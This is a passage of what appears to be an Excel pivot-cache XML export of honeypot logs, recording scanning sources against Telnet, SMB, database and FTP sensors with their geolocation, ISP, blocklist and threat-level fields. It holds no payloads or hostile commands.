    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;44355&amp;&amp;46647&amp;&amp;46668&amp;&amp;NA&amp;&amp;80&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="None"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d50:c273"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1155"/>
    <x v="1155"/>
    <s v="NA&amp;&amp;mail.c-tech.ac.th"/>
    <x v="0"/>
    <d v="2025-04-22T10:01:19"/>
    <d v="2024-05-23T06:06:33"/>
    <d v="2025-04-22T10:01:19"/>
    <n v="282"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H20&amp;&amp;SMA-LAB_SMB_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;37985&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="20"/>
    <s v="Chon Buri"/>
    <s v="Bang Lamung"/>
    <s v="Pattaya"/>
    <s v="1614295"/>
    <s v="NA"/>
    <s v="12.9333"/>
    <s v="100.883"/>
    <s v="45758"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="residential"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="2009-09-16"/>
    <s v="TTBP-TH"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,6587)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,61206)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,61978)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,57672)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,51310)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,15524)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,52150)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,26853)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,60823)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,7704)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,8099)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,51575)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,52352)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['NS2.3BB.CO.TH', 'NS1.3BB.CO.TH']"/>
    <s v="THNIC"/>
    <s v="ACTIVE"/>
    <s v="None"/>
    <x v="21"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:b4b7:f6e1"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1156"/>
    <x v="1156"/>
    <s v="NA&amp;&amp;110-24-32-53.adsl.fetnet.net"/>
    <x v="0"/>
    <d v="2025-04-22T09:31:34"/>
    <d v="2024-09-10T03:16:00"/>
    <d v="2025-04-22T09:31:34"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;16417"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="Banqiao District"/>
    <s v="1670029"/>
    <s v="NA"/>
    <s v="25.0114"/>
    <s v="121.462"/>
    <s v="9674"/>
    <s v="Far EastTone Telecommunication Co., Ltd."/>
    <s v="Far EasTone Telecommunication Co., Ltd."/>
    <s v="residential"/>
    <s v="FETNET"/>
    <s v="2009-02-23"/>
    <s v="FETNET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1999-09-10 03:35:57"/>
    <s v="2025-09-10 03:35:57"/>
    <s v="2023-09-08 10:24:41"/>
    <s v="['DNS01.FETNET.NET', 'DNS02.FETNET.NET']"/>
    <s v="Network Solutions, LLC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:6e18:2035"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1157"/>
    <x v="1157"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T07:01:23"/>
    <d v="2025-04-16T06:49:04"/>
    <d v="2025-04-22T07:01:23"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="20"/>
    <s v="Thái Bình Province"/>
    <s v="Tiền Hải District"/>
    <s v="Tiền Hải"/>
    <s v="1572508"/>
    <s v="NA"/>
    <s v="20.4056"/>
    <s v="106.504"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ee5:ab37"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1158"/>
    <x v="1158"/>
    <s v="NA&amp;&amp;47-143-196-70.bng01.mntc.ca.frontiernet.net"/>
    <x v="0"/>
    <d v="2025-04-22T06:43:45"/>
    <d v="2025-03-16T18:23:13"/>
    <d v="2025-04-22T06:43:45"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Los Angeles"/>
    <s v="Pomona"/>
    <s v="5384170"/>
    <s v="91766"/>
    <s v="34.044"/>
    <s v="-117.727"/>
    <s v="5650"/>
    <s v="Frontier Communications of America, Inc."/>
    <s v="Frontier Communications of America, Inc."/>
    <s v="business"/>
    <s v="Frontier Communications Corporation"/>
    <s v="2015-08-28"/>
    <s v="FCC-212"/>
    <s v="2015-08-28"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1995-10-14 04:00:00"/>
    <s v="2025-10-13 04:00:00"/>
    <s v="2025-02-12 08:29:05"/>
    <s v="['A1-204.AKAM.NET', 'A13-67.AKAM.NET', 'AUTH.ASBN.VA.FRONTIERNET.NET', 'AUTH.FRONTIERNET.NET', 'AUTH.ROCH.NY.FRONTIERNET.NET']"/>
    <s v="Register.com, Inc."/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:2f8f:c446"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1159"/>
    <x v="1159"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T06:12:09"/>
    <d v="2025-03-21T23:38:36"/>
    <d v="2025-04-22T06:12:09"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_MYSQL_H18"/>
    <s v="21&amp;&amp;3306&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.35208"/>
    <s v="103.82"/>
    <s v="45102"/>
    <s v="Alibaba (US) Technology Co., Ltd."/>
    <s v="Alibaba (US) Technology Co., Ltd."/>
    <s v="hosting"/>
    <s v="Alibaba.com LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2fec:60d0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1160"/>
    <x v="1160"/>
    <s v="nz242l76.bb122100.ctm.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-22T06:10:11"/>
    <d v="2025-03-02T08:35:29"/>
    <d v="2025-04-22T06:10:11"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MO"/>
    <s v="Macao"/>
    <s v="NA"/>
    <s v="Nossa Senhora do Carmo"/>
    <s v="NA"/>
    <s v="Taipa"/>
    <s v="1821263"/>
    <s v="NA"/>
    <s v="22.1597"/>
    <s v="113.564"/>
    <s v="4609"/>
    <s v="Companhia de Telecomunicacoes de Macau"/>
    <s v="Companhia de Telecomunicacoes de Macau"/>
    <s v="business"/>
    <s v="CTM Internet Service"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a64:f24c"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1161"/>
    <x v="1161"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T04:19:26"/>
    <d v="2025-04-04T12:40:19"/>
    <d v="2025-04-22T04:19:26"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H28&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="152194"/>
    <s v="CTG Server Limited"/>
    <s v="CTG Server Limited"/>
    <s v="hosting"/>
    <s v="Integen, Inc"/>
    <s v="2013-06-28"/>
    <s v="INTEGEN-2"/>
    <s v="2013-06-28"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c0fc:b52d"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1162"/>
    <x v="1162"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T04:01:36"/>
    <d v="2024-11-22T04:38:39"/>
    <d v="2025-04-22T04:01:36"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="2004-08-02"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b1a:76e0"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1163"/>
    <x v="1163"/>
    <s v="pl10286.ag2001.nttpc.ne.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-22T02:15:28"/>
    <d v="2025-04-14T14:06:51"/>
    <d v="2025-04-22T02:15:28"/>
    <n v="31"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-8111"/>
    <s v="35.6906"/>
    <s v="139.77"/>
    <s v="2514"/>
    <s v="NTT PC Communications, Inc."/>
    <s v="NTT PC Communications, Inc."/>
    <s v="business"/>
    <s v="InfoSphere"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:db66:812e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1164"/>
    <x v="1164"/>
    <s v="NA&amp;&amp;061244059051.static.ctinets.com"/>
    <x v="0"/>
    <d v="2025-04-22T02:15:17"/>
    <d v="2025-04-11T09:01:43"/>
    <d v="2025-04-22T02:15:17"/>
    <n v="116"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3702"/>
    <s v="114.13"/>
    <s v="9269"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="residential"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3df4:3b33"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1165"/>
    <x v="1165"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T02:12:02"/>
    <d v="2023-10-07T21:30:00"/>
    <d v="2025-04-22T02:12:02"/>
    <n v="304"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="22&amp;&amp;23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Toegye-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5614"/>
    <s v="126.996"/>
    <s v="9318"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="business"/>
    <s v="broadNnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:72c8:4fbb"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1166"/>
    <x v="1166"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T02:11:28"/>
    <d v="2023-07-29T21:01:58"/>
    <d v="2025-04-22T02:11:28"/>
    <n v="1484"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;S